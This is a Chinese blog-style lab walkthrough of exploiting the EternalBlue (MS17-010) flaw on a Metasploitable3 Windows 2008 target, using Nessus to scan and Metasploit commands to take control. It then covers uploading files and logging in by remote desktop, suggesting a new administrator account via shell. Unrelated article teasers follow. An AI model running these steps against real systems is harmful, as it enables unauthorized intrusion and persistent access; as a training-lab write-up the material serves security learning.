Windows靶机永恒之蓝MS17-010漏洞复现

2024-02-08 08:38

本文主要是介绍Windows靶机永恒之蓝MS17-010漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 实验目标
    • 实验环境
    • 实验步骤
      • 一、利用Nessus工具扫描靶机漏洞
      • 二、MS17-010漏洞复现(利用MSF框架)
      • 三、在攻击端对靶机进行控制

实验目标

扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权

实验环境

攻击机:kali 2020.3 (IP地址:192.168.146.147)
靶机:metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145)

实验步骤

一、利用Nessus工具扫描靶机漏洞

  1. 在kali上安装Nessus
    从官网上直接下载安装包安装即可(注意版本)
    Nessus官网地址:https://www.tenable.com
  2. 点击右上角“New Scan”,然后在页面上选择“Basic Network Scan”,填入扫描名字和目标IP,点击“save”,之后启动扫描
    在这里插入图片描述在这里插入图片描述
  3. 扫描结果

在这里插入图片描述
这里我们选择MS17-010漏洞进行攻击

二、MS17-010漏洞复现(利用MSF框架)

  1. 启动MSF
msfconsole
  1. 搜索漏洞
search ms17-010

在这里插入图片描述

  1. 选择利用eternalblue模块(序号为0)
use 0

在这里插入图片描述

  1. 设置攻击参数(主机,端口号等)
set rhosts=192.168.146.145
//设置目标主机IP,端口号一般默认即可
  1. 查看攻击参数
show options
//检查是否有相关参数未设置

在这里插入图片描述

  1. 开始攻击(出现WIN说明可以完全控制靶机)
run

在这里插入图片描述
出现WIN,说明,我们已经成功拿到靶机的控制权

三、在攻击端对靶机进行控制

  1. 在攻击端上传文件到靶机c盘根目录下

(1)攻击端:创建文件并上传该文件至靶机C盘根目录

在这里插入图片描述

upload 文件路径 c:/

在这里插入图片描述
(2)在靶机端可以看到该文件
在这里插入图片描述
在这里插入图片描述

  1. 远程控制靶机桌面

(1)在kali端重新打开一个命令窗口输入:

rdesktop -u 用户名 -p 密码 ip
//靶机的用户名和密码

不知道用户名和密码的可以在kali端通过shell为靶机创建新的用户名和密码,并将新用户添加入管理组
在这里插入图片描述
(2)可以看到在kali端已通过远程桌面连接到目标靶机
在这里插入图片描述
(3)除了上面两种之外,真正能做的事情还有更多,所以一定要安装安全软件,定期打补丁

这篇关于Windows靶机永恒之蓝MS17-010漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/690487

相关文章

问题-windows-VPN不正确关闭导致网页打不开

为什么会发生这类事情呢? 主要原因是关机之前vpn没有关掉导致的。 至于为什么没关掉vpn会导致网页打不开,我猜测是因为vpn建立的链接没被更改。 正确关掉vpn的时候,会把ip链接断掉,如果你不正确关掉,ip链接没有断掉,此时你vpn又是没启动的,没有域名解析,所以就打不开网站。 你可以在打不开网页的时候,把vpn打开,你会发现网络又可以登录了。 方法一 注意:方法一虽然方便,但是可能会有

Windows/macOS/Linux 安装 Redis 和 Redis Desktop Manager 可视化工具

本文所有安装都在macOS High Sierra 10.13.4进行,Windows安装相对容易些,Linux安装与macOS类似,文中会做区分讲解 1. Redis安装 1.下载Redis https://redis.io/download 把下载的源码更名为redis-4.0.9-source,我喜欢跟maven、Tomcat放在一起,就放到/Users/zhan/Documents

Windows中,.net framework 3.5安装

安装.net framework,目前已知2种方法,如下: 一、在MSDN下载对应的安装包,安装,这种可能无法安装成功,概率很大,不成功使用第二种方法,基本上没问题。 二、win8/8.1/10 下安装 .net framework 3.5.1: 1. 打开 win8/8.1/10 安装盘(这里指系统安装镜像文件),提取 sources\sxs 文件夹到 X:\sources\sxs (X代

Windows 可变刷新率是什么?如何开启?

在现代计算设备中,显示屏的刷新率对用户体验起着至关重要的作用。随着显示技术的不断进步,固定刷新率显示器逐渐被支持可变刷新率(Variable Refresh Rate, VRR)技术的显示器所取代。 可变刷新率定义 可变刷新率是什么?可变刷新率(VRR)是一种显示技术,它允许显示器的刷新率动态调整,以匹配显卡输出的帧率。传统的显示器通常具有固定的刷新率(如60Hz、75Hz等),这意味着显示器

如何设置windows计划任务

如何设置windows计划任务 前言:在工作过程中写了一个python脚本,用于调用jira接口查询bug单数量,想要在本地定时任务执行,每天发送到钉钉群提醒,写下操作步骤用于记录。 1. 准备 Python 脚本 确保你的 Python 脚本已经保存到一个文件,比如 jira_reminder.py。 2. 创建批处理文件 为了方便任务计划程序运行 Python 脚本,创建一个批处理文

获取Windows系统版本号(转)

https://blog.csdn.net/sunflover454/article/details/51525179

博通5720 windows server 2003 32位网卡驱动和系统

driver for DELL R320 Broadcom 5720 Windows 2003 32bit 本人安装windows server 2003 网卡驱动成功!! 提供方便网盘下载地址博通5720网卡驱动 : http://pan.baidu.com/s/1GQWpw  windows server 2003 ghost 系统: http://pan

Linux平台与Windows平台字节对齐(一)

记录时间:2014-10-20 20:31 今天白天在整理 winndows平台 + Arm平台的网络数据包。但期间由于经验不足,不了解两平台CPU架构的差距会影响到数据类型的大小,导致在工程非常紧急的时间里还浪费了很多宝贵的时间,鉴于问题的常见性 和 隐秘行,特此列出,以便能帮助需要帮助的人。 解决问题思路:在遇到网络交互数据不对时,可以从如下四方面去排除问题,通常只要使用这三种

【漏洞复现】畅捷通T+ keyEdit.aspx SQL漏洞

0x01 产品简介 畅捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括: 采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素

汽车网络安全 -- 漏洞该如何管理

目录 1.漏洞获取途径汇总 2.CAVD的漏洞管理规则简析 2.1 通用术语简介 2.2 漏洞评分指标 2.3.1 场景参数 2.3.2 威胁参数  2.3.3 影响参数 2.3 漏洞等级判定 ​3.小结 在汽车网络安全的时代背景下,作为一直从事车控类ECU基础软件开发的软件dog,一直在找切入点去了解车联网产品的各种网络安全知识。 特别是历史上各种汽车网络安全事件、